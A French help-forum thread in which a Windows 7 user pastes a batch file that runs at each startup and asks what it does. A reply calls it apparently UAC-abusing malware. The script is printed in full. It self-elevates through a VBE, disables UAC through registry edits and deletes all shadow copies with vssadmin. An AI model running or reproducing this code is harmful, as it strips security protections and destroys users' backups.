ficher batch qui s'exécute à tous les démarragesFermé

Question

Bonjour, 
Un fichier batch s'exécute automatiquement à tous les démarrages de mon PC et me gonfle vraiment, et je voudrais le supprimer. voici le programme qu'il comporte:
@echo off
mode con lines=1 cols=14
ver | find /i "version 6.1." > nul
if %errorlevel%==0 goto patch
ver | find /i "version 6.0." > nul
if %errorlevel%==0 goto patch
:exit
exit
:patch
if exist "%temp%\ADMIN.vbe" del /q /s /f "%temp%\ADMIN.vbe"  > nul 
if exist "%temp%\CPBA.bat" del /q /s /f "%temp%\CPBA.bat"  > nul 
echo set objshell = createobject("shell.application") > "%temp%\ADMIN.vbe" 
echo set fsO = createobject("scripting.filesystemobject") >> "%temp%\ADMIN.vbe" 
echo strpath = fso.getparentfoldername(wscript.scriptfullname) >> "%temp%\ADMIN.vbe" 
echo objshell.shellexecute "cmd.exe", "/c" ^& Chr(34) ^& strpath ^& "\CPBA.bat" ^& Chr(34), "", "runas", 0 >> "%temp%\ADMIN.vbe" 
echo wscript.sleep 1000 >> "%temp%\ADMIN.vbe" 
echo on error resume next >> "%temp%	p.vbe" 
echo WScript.CreateObject("WScript.Shell").RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools",0, "REG_DWORD" >> "%temp%	p.vbe" 
echo "%temp%	p.vbe" >> "%temp%\CPBA.bat" 
echo del/f/q "%temp%	p.vbe" >> "%temp%\CPBA.bat" 
echo reg add hklm\software\microsoft\windows\currentversion\policies\system /v consentpromptbehavioradmin /t reg_dword /d 0 /f ^> nul >> "%temp%\CPBA.bat" 
echo reg add hklm\software\microsoft\windows\currentversion\policies\system /v enablelua /t reg_dword /d 0 /f ^> nul >> "%temp%\CPBA.bat" 
start "" /wait "%temp%\ADMIN.vbe"    
 reg query hklm\software\microsoft\windows\currentversion\policies\system /v enablelua | find /i "0x0" >nul 
 if %errorlevel%==0 goto ok 
 start ""/wait/MAX "%temp%\uac.bat" 
:ok
if exist "%temp%\ADMIN.vbe" del /q /s /f "%temp%\ADMIN.vbe"  > nul 
if exist "%temp%\CPBA.bat" del /q /s /f "%temp%\CPBA.bat"  > nul 
 vssadmin delete shadows /all /quiet 
EXIT

je voudrais savoir s'il vous plait ce qu'il fait exactement et comment le supprimer.....
merci d'avance..
NB: j'ai pu le voir dans fichiers temporaires mais sa source est ailleurs!!!
Configuration: Windows 7 / Internet Explorer 8.0

ryko1820 · Answer

Apparemment tu as un malware qui joue avec l'uac pour installer des trucs discrètement  ...
Tu devrais rediriger ton post vers le forum virus, en utilisant le bouton "signaler"  et en suivant les dialogues qui te seront proposés (mauvais forum/etc ...) pour avoir des réponses pertinentes ...

Ficher batch qui s'exécute à tous les démarrages

1 réponse

Discussions similaires

Newsletters